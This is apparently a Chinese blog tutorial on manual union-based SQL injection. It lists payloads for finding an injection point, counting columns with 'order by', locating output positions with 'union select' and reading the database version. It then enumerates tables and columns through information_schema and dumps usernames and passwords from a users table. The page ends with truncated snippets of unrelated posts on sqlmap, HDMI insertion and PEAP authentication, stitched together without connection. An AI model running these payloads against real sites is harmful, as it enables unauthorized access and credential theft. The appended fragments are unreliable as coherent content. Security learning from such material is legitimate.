SQL注入流程

2022-10-09 01:39:10 字數 1217 閱讀 6697

輸入單引號    '    進行檢驗是否存在輸入

id=1 '

原理:頁面發生了報錯,說明輸入的單引號    '    影響了資料庫查詢,說明此處存在可控的引數,存在注入點

輸入 and 1=2    檢驗是字元型還是數字型

id=1  and 1=2

報錯,證明是數字型。

原理:字元型在查詢有閉合符號,如果直接將and 1=2帶入查詢,以及後後面的測試語句,都會當成字串,不會被執行。

輸入、"、)、}  單個或者組合後在家測試語句   and 1=2   加注釋符號{ # 、 --+ 、%23)

原理:使語句能正常執行 

id=1 order by 3

使用二分法,如果輸入錯誤則報錯,如果存在就維持原狀。

原理:select * from table order by n 表示select裡面的第n個字段,從而判斷有幾行

id=-1 union select 1,2,3 %23

發現有2個輸出位(為了union聯合查詢可以正常執行所以要使前方資訊報錯,後邊用%23進行注釋)

原理:union 操作符用於合併兩個或多個 select 語句的結果集

id=-1 union select 1,2,version() %23

發現版本號為5.5.23(版本號5.0以上會專門生成乙個叫information_schema的庫,這個庫里有資料庫中所有表的名字)

id=-1 union select1,2,group_concat

(table_namefrom information_schema.tables where table_schema = database() %23

原理:group_concat(str1, str2,...)將多個字串連線成乙個字串

id=-1 union select 1,2,group_concat(column_name)%20from information_schema.columns where table_name ="users"%23

id=-1 union select 1,2, group_concat(username,password) from users %23

group_concat() 顯示查詢到所有的列

information_schema乙個庫

schemata:儲存所有資料庫的名字

tables:儲存說有表的名字

columns:儲存所有欄位的名字

SQL注入流程

目標蒐集 手工簡單識別 and 1 1 and 1 2 and 1 1 and 1 2 and 1 like 1 and 1 like 2 工具識別 sqlmap m filename filename中儲存檢測目標 sqlmap crawl sqlmap對目標 進行爬取,然後依次進行測試 高階識別...

hdmi插入流程

50ms定時器,一直在迴圈輪訓。當5v檢測插入後,判斷在當前訊號源後 rx.open fg會被設定為1 繼續往下走,檢測不到不往下走 void hdmirx timer handler unsigned long arg rx.open fg 1 的情況下走hdmirx hw monitor rx....

PEAP接入流程

證書主要用來進行終端和網路的相互認證。radius 伺服器首先向 ca證書頒發機構申請伺服器證書,用來代表 radius 伺服器的合法性。客戶端向 caca 根證書,用來驗證 radius 客戶端通過開放系統接入的方法 open system 和ap 之間建立好物理連線。1 client向ap 裝置...